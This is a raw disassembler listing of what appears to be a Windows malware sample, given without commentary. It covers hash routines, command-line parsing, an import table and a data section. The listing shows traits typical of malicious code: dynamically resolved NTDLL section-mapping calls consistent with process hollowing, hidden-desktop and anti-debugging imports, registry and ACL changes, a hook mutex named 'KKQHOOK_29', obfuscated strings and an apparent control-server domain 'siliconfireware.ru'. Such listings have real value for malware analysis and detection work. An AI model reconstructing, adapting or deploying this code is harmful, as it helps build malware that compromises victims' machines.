mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BDB5
add eax, [edi+0Ch]
add eax, [esi+0Ch]
add eax, 8F0CCC92h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BDB5
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFEFF47Dh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BDB5
add eax, [edi+4]
add eax, [esi+4]
add eax, 85845DD1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BDB5
add eax, [edi]
add eax, [esi+20h]
add eax, 6FA87E4Fh
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BDB5
add eax, [edi+0Ch]
add eax, [esi+3Ch]
add eax, 0FE2CE6E0h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BDB5
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A3014314h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BDB5
add eax, [edi+4]
add eax, [esi+34h]
add eax, 4E0811A1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BDB5
add eax, [edi]
add eax, [esi+10h]
add eax, 0F7537E82h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BDB5
add eax, [edi+0Ch]
add eax, [esi+2Ch]
add eax, 0BD3AF235h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BDB5
add eax, [edi+8]
add eax, [esi+8]
add eax, 2AD7D2BBh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BDB5
add eax, [edi+4]
add eax, [esi+24h]
add eax, 0EB86D391h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov eax, dword_447BBC
add [edi], eax
mov eax, dword_447BC0
add [edi+4], eax
mov eax, dword_447BC4
add [edi+8], eax
mov eax, dword_447BC8
add [edi+0Ch], eax
popa
pop ebp
xor eax, eax
retn 8
sub_40BDE5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C630 proc near ; CODE XREF: sub_4098A8+1010�p
var_1C = dword ptr -1Ch
var_4 = word ptr -4
var_2 = word ptr -2
push ebp
mov ebp, esp
sub esp, 1Ch
fnstcw [ebp+var_2]
mov ax, [ebp+var_2]
or ah, 0Ch
mov [ebp+var_4], ax
fldcw [ebp+var_4]
fistp [esp+1Ch+var_1C]
mov eax, [esp+1Ch+var_1C]
fldcw [ebp+var_2]
leave
retn
sub_40C630 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C654 proc near ; CODE XREF: start+66�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push edi
call GetCommandLineA ; GetCommandLineA
mov edi, eax
cmp byte ptr [edi], 22h
jnz short loc_40C688
push 22h ; Val
mov eax, edi
inc eax
push eax ; Str
call strchr ; strchr
add esp, 8
mov [ebp+var_4], eax
or eax, eax
jz short loc_40C6A3
mov edi, eax
inc edi
jmp short loc_40C680
; ---------------------------------------------------------------------------
loc_40C67F: ; CODE XREF: sub_40C654+2F�j
inc edi
loc_40C680: ; CODE XREF: sub_40C654+29�j
cmp byte ptr [edi], 20h
jz short loc_40C67F
jmp short loc_40C6A3
; ---------------------------------------------------------------------------
loc_40C687: ; CODE XREF: sub_40C654+3E�j
inc edi
loc_40C688: ; CODE XREF: sub_40C654+F�j
movsx eax, byte ptr [edi]
or eax, eax
jz short loc_40C694
cmp eax, 20h
jnz short loc_40C687
loc_40C694: ; CODE XREF: sub_40C654+39�j
jmp short loc_40C697
; ---------------------------------------------------------------------------
loc_40C696: ; CODE XREF: sub_40C654+4D�j
inc edi
loc_40C697: ; CODE XREF: sub_40C654:loc_40C694�j
movsx eax, byte ptr [edi]
or eax, eax
jz short loc_40C6A3
cmp eax, 20h
jz short loc_40C696
loc_40C6A3: ; CODE XREF: sub_40C654+24�j
; sub_40C654+31�j ...
push 0 ; lpModuleName
call GetModuleHandleA ; GetModuleHandleA
push 1 ; int
push edi ; int
push 0 ; int
push eax ; hModule
call sub_40AA24
pop edi
leave
retn
sub_40C654 endp
; =============== S U B R O U T I N E =======================================
sub_40C6B8 proc near ; CODE XREF: sub_40133B+8�p
; sub_402A48+8�p ...
var_FFC = dword ptr -0FFCh
pop ecx
loc_40C6B9: ; CODE XREF: sub_40C6B8+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_40C6B9
sub esp, eax
test [esp+0FFCh+var_FFC], eax
jmp ecx
sub_40C6B8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40C6D8 proc near ; CODE XREF: sub_401BB7+CC�p
; sub_40523D+38�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
xor eax, eax
mov ecx, 0FFFFFFFFh
xchg edi, edx
repne scasb
neg ecx
lea ecx, [ecx-1]
mov eax, [esp+arg_4]
xchg eax, esi
mov edi, [esp+arg_0]
rep movsb
xchg eax, esi
xchg edx, edi
mov eax, [esp+arg_0]
retn 8
sub_40C6D8 endp
; ---------------------------------------------------------------------------
align 4
; [00000006 BYTES: COLLAPSED FUNCTION DeleteFileA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION ExitProcess. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION ExpandEnvironmentStringsA. PRESS KEYPAD "+" TO EXPAND]
align 8
; [00000006 BYTES: COLLAPSED FUNCTION GetCommandLineA. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION GetCurrentProcessId. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION GetCurrentThreadId. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION GetFileSize. PRESS KEYPAD "+" TO EXPAND]
align 8
; [00000006 BYTES: COLLAPSED FUNCTION GetFileTime. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION GetLastError. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION GetModuleFileNameA. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION GetModuleHandleA. PRESS KEYPAD "+" TO EXPAND]
align 8
; [00000006 BYTES: COLLAPSED FUNCTION GetProcAddress. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION GetProcessHeap. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION GetSystemDirectoryA. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION CloseHandle. PRESS KEYPAD "+" TO EXPAND]
align 8
; [00000006 BYTES: COLLAPSED FUNCTION GetTempPathA. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION GetTickCount. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION GetVersion. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION GetVersionExA. PRESS KEYPAD "+" TO EXPAND]
align 8
; [00000006 BYTES: COLLAPSED FUNCTION GetVolumeInformationA. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION GetWindowsDirectoryA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION GlobalAddAtomA. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION GlobalDeleteAtom. PRESS KEYPAD "+" TO EXPAND]
align 8
; [00000006 BYTES: COLLAPSED FUNCTION GlobalFindAtomA. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION GlobalMemoryStatus. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION InterlockedIncrement. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION IsBadReadPtr. PRESS KEYPAD "+" TO EXPAND]
align 8
; [00000006 BYTES: COLLAPSED FUNCTION IsBadWritePtr. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION IsDebuggerPresent. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION LoadLibraryA. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION CopyFileA. PRESS KEYPAD "+" TO EXPAND]
align 8
; [00000006 BYTES: COLLAPSED FUNCTION LocalAlloc. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION LocalFree. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION OpenMutexA. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION OpenProcess. PRESS KEYPAD "+" TO EXPAND]
align 8
; [00000006 BYTES: COLLAPSED FUNCTION ReadFile. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION RtlUnwind. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION RtlZeroMemory. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION CreateFileA. PRESS KEYPAD "+" TO EXPAND]
align 8
; [00000006 BYTES: COLLAPSED FUNCTION SetFilePointer. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION SetFileTime. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION Sleep. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION TerminateProcess. PRESS KEYPAD "+" TO EXPAND]
align 8
; [00000006 BYTES: COLLAPSED FUNCTION VirtualAlloc. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION VirtualFree. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION VirtualQuery. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION WideCharToMultiByte. PRESS KEYPAD "+" TO EXPAND]
align 8
; [00000006 BYTES: COLLAPSED FUNCTION WinExec. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION WriteFile. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION CreateMutexA. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION lstrlenA. PRESS KEYPAD "+" TO EXPAND]
align 8
; [00000006 BYTES: COLLAPSED FUNCTION lstrlenW. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION CreateProcessA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION CreateThread. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION CallWindowProcA. PRESS KEYPAD "+" TO EXPAND]
align 8
; [00000006 BYTES: COLLAPSED FUNCTION GetWindowTextA. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION GetWindowRect. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION FindWindowA. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION GetWindow. PRESS KEYPAD "+" TO EXPAND]
align 8
; [00000006 BYTES: COLLAPSED FUNCTION GetClassNameA. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION SetFocus. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION GetForegroundWindow. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION LoadCursorA. PRESS KEYPAD "+" TO EXPAND]
align 8
; [00000006 BYTES: COLLAPSED FUNCTION SetTimer. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION LoadIconA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION MessageBoxA. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION GetMessageA. PRESS KEYPAD "+" TO EXPAND]
align 8
; [00000006 BYTES: COLLAPSED FUNCTION GetWindowLongA. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION SetWindowLongA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION CreateDesktopA. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION SetThreadDesktop. PRESS KEYPAD "+" TO EXPAND]
align 8
; [00000006 BYTES: COLLAPSED FUNCTION GetThreadDesktop. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION TranslateMessage. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION DispatchMessageA. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION wsprintfA. PRESS KEYPAD "+" TO EXPAND]
align 8
; [00000006 BYTES: COLLAPSED FUNCTION SendMessageA. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION RegisterClassA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION PostQuitMessage. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION ShowWindow. PRESS KEYPAD "+" TO EXPAND]
align 8
; [00000006 BYTES: COLLAPSED FUNCTION CreateWindowExA. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION DestroyWindow. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION MoveWindow. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION DefWindowProcA. PRESS KEYPAD "+" TO EXPAND]
align 8
; [00000006 BYTES: COLLAPSED FUNCTION GetStockObject. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION SetBkColor. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION SetTextColor. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION CreateBrushIndirect. PRESS KEYPAD "+" TO EXPAND]
align 8
; [00000006 BYTES: COLLAPSED FUNCTION CreateFontA. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION OpenProcessToken. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION GetTokenInformation. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION RegCreateKeyExA. PRESS KEYPAD "+" TO EXPAND]
align 8
; [00000006 BYTES: COLLAPSED FUNCTION RegCloseKey. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION RegOpenKeyExA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION RegQueryValueExA. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION RegSetValueExA. PRESS KEYPAD "+" TO EXPAND]
align 8
; [00000006 BYTES: COLLAPSED FUNCTION GetSecurityInfo. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION SetSecurityInfo. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION SetEntriesInAclA. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION GetSidIdentifierAuthority. PRESS KEYPAD "+" TO EXPAND]
align 8
; [00000006 BYTES: COLLAPSED FUNCTION GetSidSubAuthority. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION GetSidSubAuthorityCount. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION _itoa. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION __GetMainArgs. PRESS KEYPAD "+" TO EXPAND]
align 8
; [00000006 BYTES: COLLAPSED FUNCTION _sleep. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION _stricmp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION abs. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION exit. PRESS KEYPAD "+" TO EXPAND]
align 8
; [00000006 BYTES: COLLAPSED FUNCTION memcmp. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION memcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION memset. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION raise. PRESS KEYPAD "+" TO EXPAND]
align 8
; [00000006 BYTES: COLLAPSED FUNCTION rand. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION signal. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION sprintf. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION srand. PRESS KEYPAD "+" TO EXPAND]
align 8
; [00000006 BYTES: COLLAPSED FUNCTION sscanf. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION strcat. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION strchr. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0
; [00000006 BYTES: COLLAPSED FUNCTION strncmp. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(90h)
dd 0DBh dup(0)
dword_40D000 dd 0 ; sub_4082AB+89�r ...
dd 41Dh dup(0)
dword_40E078 dd 0 ; sub_40B2CA+C8�r
dword_40E07C dd 0 ; sub_401D31+45C�w ...
; char byte_40E080[]
byte_40E080 db 100h dup(0) ; DATA XREF: sub_408048+1C8�o
; sub_4098A8+709�o ...
dword_40E180 dd 0 ; sub_40354F:loc_4035D1�r
dd 413h dup(0)
dword_40F1D0 dd 0 ; sub_401D31+21E�w ...
dword_40F1D4 dd 0 ; sub_401D31+3E9�r ...
dword_40F1D8 dd 0 ; sub_406D2E+FF5�r ...
byte_40F1DC db 0 ; DATA XREF: sub_401D31+11D�w
align 10h
; char FileName[]
FileName db 100h dup(0) ; DATA XREF: sub_40133B+2F�o
; sub_40AA24+425�o ...
; LPVOID lp
lp dd 0 ; DATA XREF: sub_402843+82�r
; sub_402A48+D0�w ...
dd 0FFh dup(0)
dword_40F6E0 dd 0 ; sub_40372A+96�r
dd 44Eh dup(0)
; HWND dword_41081C
dword_41081C dd 0 ; sub_408ED0+855�r ...
dword_410820 dd 0 ; .text:loc_401BAD�r
dd 41Fh dup(0)
dword_4118A0 dd 0 dd 0FFh dup(0)
dword_411CA0 dd 0 ; sub_403FD8+89�r
dd 44Fh dup(0)
dword_412DE0 dd 0 ; .text:00402559�r
dd 44Eh dup(0)
dword_413F1C dd 0 ; sub_40B2CA+DD�r
; HWND dword_413F20
dword_413F20 dd 0 ; sub_408ED0+8AD�r ...
align 10h
dword_413F30 dd 0 ; sub_408AB9+89�r
dd 44Fh dup(0)
byte_415070 db 0 ; DATA XREF: sub_401D31+3F1�w
align 8
byte_415078 db 0 ; DATA XREF: sub_401D31+5F�w
; sub_401D31+64�r ...
align 4
dword_41507C dd 0 ; sub_401D31+1C8�w ...
; char byte_415080[]
byte_415080 db 100h dup(0) ; DATA XREF: sub_4098A8+8C1�o
; sub_4098A8+9EC�o ...
; HMODULE hModule
hModule dd 0 ; DATA XREF: sub_402A48+A7�w
; sub_402A48+C4�r ...
dd 0FFh dup(0)
dword_415580 dd 0 ; sub_407FBC:loc_40803E�r
dd 45Bh dup(0)
dword_4166F0 dd 0 ; .text:00401991�r
dd 3FFh dup(0)
dword_4176F0 dd 0 ; sub_404491+8E�r
dd 3F3h dup(0)
dword_4186C0 dd 0 ; .text:loc_40221C�r
dd 413h dup(0)
; struct _OSVERSIONINFOA VersionInformation
VersionInformation _OSVERSIONINFOA <0> ; DATA XREF: sub_40AA24+C3�w
; sub_40AA24+D2�o
align 10h
dword_4197B0 dd 0 ; sub_405138+81�r
dd 40Fh dup(0)
dword_41A7F0 dd 0 ; .text:004014BF�r
dd 3EBh dup(0)
byte_41B7A0 db 0 ; DATA XREF: sub_401D31+3B8�w
; sub_401D31+3BD�r
align 4
dword_41B7A4 dd 0 ; sub_401D31+D0�r ...
dword_41B7A8 dd 0 dword_41B7AC dd 0 ; resolved to->NTDLL.ZwOpenSection ; sub_4022BB+FF�r ...
dword_41B7B0 dd 0 ; sub_40129C+95�r
dd 402h dup(0)
; HWND dword_41C7BC
dword_41C7BC dd 0 ; sub_40AA24+841�r ...
dword_41C7C0 dd 0 ; sub_406815+A2�r
dd 435h dup(0)
; HWND dword_41D898
dword_41D898 dd 0 ; sub_408ED0+21E�r
; HWND hWnd
hWnd dd 0 ; DATA XREF: sub_408ED0+4B�w
; sub_408ED0+6F�r ...
dword_41D8A0 dd 0 ; resolved to->NTDLL.ZwUnmapViewOfSection ; sub_4024A8+13�r
align 10h
dword_41D8B0 dd 0 ; sub_4032E2+84�r
dd 401h dup(0)
dword_41E8B8 dd 0 ; sub_401D31:loc_401DBB�w ...
; HWND dword_41E8BC
dword_41E8BC dd 0 ; sub_408ED0+74F�r ...
dword_41E8C0 dd 0 ; sub_40B2CA+AC�r
; HWND dword_41E8C4
dword_41E8C4 dd 0 ; sub_408ED0+3B5�r ...
dword_41E8C8 dd 0 ; resolved to->NTDLL.ZwMapViewOfSection ; sub_402445+53�r
; HINSTANCE hInstance
hInstance dd 0 ; DATA XREF: sub_408ED0+9C�r
; sub_408ED0+10F�r ...
; char ExistingFileName[]
ExistingFileName db 100h dup(0) ; DATA XREF: sub_408B4C+A9�o
; sub_4098A8+DD5�o ...
dword_41E9D0 dd 0 ; sub_401D31+AC�w ...
align 10h
dword_41E9E0 dd 0 ; sub_40390E:loc_403991�r
dd 404h dup(0)
dword_41F9F4 dd 0 ; sub_40B2CA+9C�r
align 10h
; char byte_41FA00[]
byte_41FA00 db 100h dup(0) ; DATA XREF: sub_4098A8+642�o
; sub_40AA24+3FF�o ...
byte_41FB00 db 0 ; DATA XREF: sub_401D31+175�w
align 4
; HWND hWndParent
hWndParent dd 0 ; DATA XREF: sub_408ED0+DC�w
; sub_408ED0+117�r ...
align 10h
; CHAR MultiByteStr
MultiByteStr db 0 ; DATA XREF: sub_406D2E+136�o
; sub_406D2E+D2F�o ...
byte_41FB11 db 0 ; DATA XREF: sub_406D2E+EB1�r
byte_41FB12 db 0 ; DATA XREF: sub_406D2E+EBA�r
byte_41FB13 db 0 ; DATA XREF: sub_406D2E+EC3�r
dd 3FFFh dup(0)
byte_42FB10 db 0 ; DATA XREF: sub_401D31+267�w
; sub_401D31+26C�r
align 4
dword_42FB14 dd 0 ; .text:00407F76�r ...
align 10h
dword_42FB20 dd 0 ; .text:loc_401810�r
dd 43Fh dup(0)
dword_430C20 dd 0 ; resolved to->NTDLL.RtlNtStatusToDosErrordword_430C24 dd 0 ; sub_4022BB+17�r
; HWND dword_430C28
dword_430C28 dd 0 ; sub_408ED0+23F�r ...
byte_430C2C db 0 ; DATA XREF: sub_401D31+2FA�w
; sub_401D31+30B�r ...
align 10h
dword_430C30 dd 0 ; .text:loc_4043C0�r
dd 407h dup(0)
dword_431C50 dd 0 ; sub_406CA2:loc_406D24�r
dd 459h dup(0)
; HWND dword_432DB8
dword_432DB8 dd 0 ; sub_408ED0+898�r ...
dword_432DBC dd 0 ; sub_40B3E8+246�r ...
; HWND dword_432DC0
dword_432DC0 dd 0 ; sub_408ED0+373�r ...
align 10h
dword_432DD0 dd 0 ; .text:00408644�r
dd 443h dup(0)
; char Buffer[]
Buffer db 100h dup(0) ; DATA XREF: sub_403A5F+64�o
; sub_403BE7+221�o ...
; char Format
Format db 0 ; DATA XREF: sub_40133B+AD�o
; sub_408048+FC�w ...
align 4
dd 3Fh dup(0)
dword_4340E0 dd 0 ; .text:00401A74�r
dd 43Dh dup(0)
; HWND dword_4351D8
dword_4351D8 dd 0 ; sub_408ED0+8D0�r ...
; HWND dword_4351DC
dword_4351DC dd 0 ; sub_408ED0+8E5�r
dword_4351E0 dd 0 ; .text:00401600�r
dd 41Bh dup(0)
dword_436250 dd 0 ; sub_404E2A:loc_404EBC�r
dd 43Fh dup(0)
dword_437350 dd 0 ; .text:loc_401D27�r
dd 423h dup(0)
dword_4383E0 dd 0 ; .text:loc_401725�r
dd 45Fh dup(0)
dword_439560 dd 0 ; .text:00408934�r
dd 3FDh dup(0)
dword_43A558 dd 0 ; sub_40B3E8+24E�r ...
align 10h
byte_43A560 db 0 ; DATA XREF: sub_401D31+42B�w
align 10h
dword_43A570 dd 0 ; .text:00408737�r
dword_43A574 dd 6A3h dup(0)
dd offset dword_40D000
dd offset dword_43A574+0FACh
dd 8000h, 0
dword_43C010 dd 0 ; sub_40109A+110�w ...
dword_43C014 dd 0 dd 0
dword_43C01C dd 0 dword_43C020 dd 0 dword_43C024 dd 0 dword_43C028 dd 0 dword_43C02C dd 0 ; sub_40109A:loc_401208�r
dword_43C030 dd 0 dword_43C034 dd 0 ; sub_40109A+87�r ...
dword_43C038 dd 0 dword_43C03C dd 14h dup(0) ; sub_40109A+8F�o
dword_43C08C dd 0 dword_43C090 dd 0 ; sub_40109A+32�w
dword_43C094 dd 5 ; sub_408ED0+47A�r ...
dword_43C098 dd 12h ; sub_408E12+6E�r ...
dword_43C09C dd 0 ; sub_40129C:loc_4012CB�r ...
; char Name[]
Name db 'KKQHOOK_29',0 ; DATA XREF: sub_40A9BC+20�o
; sub_40AA24+5A3�o
aGu? db 'gU',27h,'= ?',0
aOX2bn db 'O+X2Bn',0
aW db 'w',0
align 4
dword_43C0BC dd 0 ; sub_4098A8+153�r ...
dword_43C0C0 dd 46h ; sub_4098A8+105C�r ...
off_43C0C4 dd offset aSiliconfirewar ; DATA XREF: sub_4098A8+126�r
; sub_4098A8+159�r
; "siliconfireware.ru"
